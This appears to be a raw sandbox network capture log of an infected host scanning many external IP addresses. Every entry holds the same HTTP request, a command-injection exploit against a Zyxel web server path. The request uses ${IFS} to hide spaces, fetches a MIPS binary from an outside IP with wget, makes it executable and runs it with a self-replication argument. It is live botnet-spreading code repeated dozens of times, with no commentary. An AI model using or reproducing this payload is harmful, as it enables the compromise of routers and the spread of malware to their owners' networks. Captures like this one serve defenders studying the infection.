                                                Jan 28, 2024 10:16:45.113570929 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9469192.168.2.2334936188.72.64.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.113585949 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9470192.168.2.2359716122.168.7.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.113641024 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9471192.168.2.2341298194.207.4.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.113665104 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9472192.168.2.235304087.111.175.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.113693953 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9473192.168.2.2343646107.45.126.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.113730907 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9474192.168.2.2336844185.67.158.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.113754988 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9475192.168.2.2354882171.147.62.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.113775015 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9476192.168.2.234216667.210.133.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.113785028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9477192.168.2.235876877.225.234.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.113832951 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9478192.168.2.235870447.150.16.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.113854885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9479192.168.2.2350988223.215.189.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.113902092 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9480192.168.2.2357936133.104.4.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.113919973 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9481192.168.2.2341202102.127.156.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.113922119 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9482192.168.2.2350062140.39.124.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.113934040 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9483192.168.2.23510485.37.113.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.113981962 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9484192.168.2.2359248131.37.146.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.114017963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9485192.168.2.235892238.255.246.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.114048958 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9486192.168.2.233627276.84.222.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.114063025 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9487192.168.2.2342228102.16.18.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.114128113 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9488192.168.2.2355510184.161.205.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.114135981 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9489192.168.2.233286654.113.80.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.114187002 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9490192.168.2.2348834137.49.100.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.114198923 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9491192.168.2.234370447.154.40.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.114231110 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9492192.168.2.234941247.27.53.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.114257097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9493192.168.2.2349154189.36.97.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.114274979 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9494192.168.2.235458072.193.224.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.114312887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9495192.168.2.233619031.47.61.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.114330053 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9496192.168.2.234717427.238.21.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.114375114 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9497192.168.2.2356646196.55.9.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.114388943 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9498192.168.2.2347006112.48.103.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.114418983 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9499192.168.2.2336990122.112.68.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.114434958 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9500192.168.2.2352646113.160.26.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.114448071 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9501192.168.2.234544220.138.133.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.114516973 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9502192.168.2.235349663.190.15.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.114528894 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9503192.168.2.2348602156.38.116.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.114538908 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9504192.168.2.2340014195.32.81.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.114573956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9505192.168.2.233961672.37.52.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.114590883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9506192.168.2.235075898.138.210.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.114617109 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9507192.168.2.234782273.156.177.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.114650965 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9508192.168.2.234205480.34.193.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.114669085 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9509192.168.2.2341992136.109.198.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.114712000 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9510192.168.2.2333366206.250.118.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.114732027 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9511192.168.2.234655084.156.116.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.114759922 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9512192.168.2.2358470183.75.248.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.114799023 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9513192.168.2.2334574201.233.138.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.114826918 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9514192.168.2.2339556151.183.28.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.114836931 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9515192.168.2.234510484.36.113.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.114865065 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9516192.168.2.2340134121.173.251.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.114897966 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9517192.168.2.2333682170.18.98.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.114918947 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9518192.168.2.2337876115.231.247.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.114936113 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9519192.168.2.2340518164.15.200.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.114969969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9520192.168.2.233964086.194.148.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.115021944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9521192.168.2.23602328.108.17.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.115041018 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9522192.168.2.235496467.83.184.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.115056038 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9523192.168.2.2342590211.23.95.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.115092993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9524192.168.2.2346890112.83.71.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.115149021 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9525192.168.2.235107292.168.86.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.115158081 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9526192.168.2.2344166199.100.10.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.115173101 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9527192.168.2.2333244112.236.121.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.115211964 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9528192.168.2.2356624218.226.238.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.115252018 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9529192.168.2.2350462164.124.251.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.115272045 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9530192.168.2.234241669.251.11.203443
                                                TimestampBytes transferredDirectionData
